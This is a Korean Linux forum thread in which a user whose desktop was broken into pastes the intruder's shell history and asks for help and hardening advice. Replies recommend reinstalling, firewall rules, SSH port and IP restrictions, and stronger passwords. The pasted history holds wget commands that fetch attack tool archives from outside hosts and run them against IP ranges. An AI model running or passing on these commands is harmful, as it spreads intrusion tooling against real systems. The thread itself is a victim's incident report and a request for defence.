또 해킹당한 거 같습니다. 도와주세요. ㅜ.ㅠ

drfaust의 이미지

오늘 아침에 연구실에 도착했더니 어의없게 제 pc가 로그인이 안되는 겁니다.

금요일까지만 해도 잘 되던놈이요. -_-;;

그래서 혹시나 하고 봤더니 역시나 해킹을 당했더군요. 아아아;;

아마 올해 들어 세번째인 것 같습니다. 이제 리눅스만을 데스크탑에서 OS로 쓴지 1년쯤 되었는데

아직까지도 보안과 네트워크 쪽은 잘 모르겠습니다.

보안이나 서버관리 책을 한 두권 보려고 했는데 이상하게 재미가 없어서

포기했더니 이런 결과가.... OTL

어떻게 뚫린 건지는 잘 모르겠지만 secure log를 보니까 제 계정의 암호를 알아냈더라구요.

/var/tmp밑에 이상한 폴더도 생겨있고...... ㅜ.ㅠ

.bash_history를 보니까 이런 명령들을 실행했던데, 어떤 짓을 한 건지 혹시 아시는 분은 좀 알려주세요.

그리고 이런 걸 막을려면 어떤 걸 공부해서 어떻게 하면 좋을지 조언 좀 부탁드립니다.
================================
w
cd /var/tmp
ls -a
wget www.free-ftp.org/MANYACK/socklist.tgz
tar zxvf socklist.tgz
rm -rf socklist.tgz
cat /proc/cpuinfo
w
passwd
cd /var/tmp
cs w
cd w
./a 64.62
cat /proc/cpuinfo
cd /var/tmp
cd w
./a 64.62
chmod +x *
./a 64.62
cd /var/tmp
cs w
cd w
./a 211.11
wget justsmoke.xhost.ro/unixcod.tar.gz
tar zxvf unixcod.tar.gz
cd unixcod
./unix 208.98
chmod +x *
chmod +x *
./unix 208.98
./unix 208.78
./unix 68.64
./unix 66.64
./unix 82.78
./unix 66.221
./unix 75.22
./unix 211.74
./unix 192.192
=================================

lacovnk의 이미지

음.. 심하군요 :(

패스워드 대입 공격에 당한 건 아닌가요? 일단 암호를 더 복잡하게 바꾸세요~ :)

블루스크린의 이미지

OS 다시 설치하시고
iptable 설정하시고(oops-firewall 좋습니다)
안쓰는 서버는 다 내리고, ssh 포트를 바꾸고, 지정된 아이피만 접속가능하게 하고, 지정된 아이디만 접속가능하게 하고, 패스워드는 자신만 알아볼수 있는 것으로 하면 도움이 되겠죠

-------------------------------------------------------------------------------
이 댓글(comment)의 수정 및 삭제를 위해 이 글에 답글(reply)을 쓰지 말아 주십시요.
의견이 있으시면 원 글에 댓글(comment)로 써 주세요.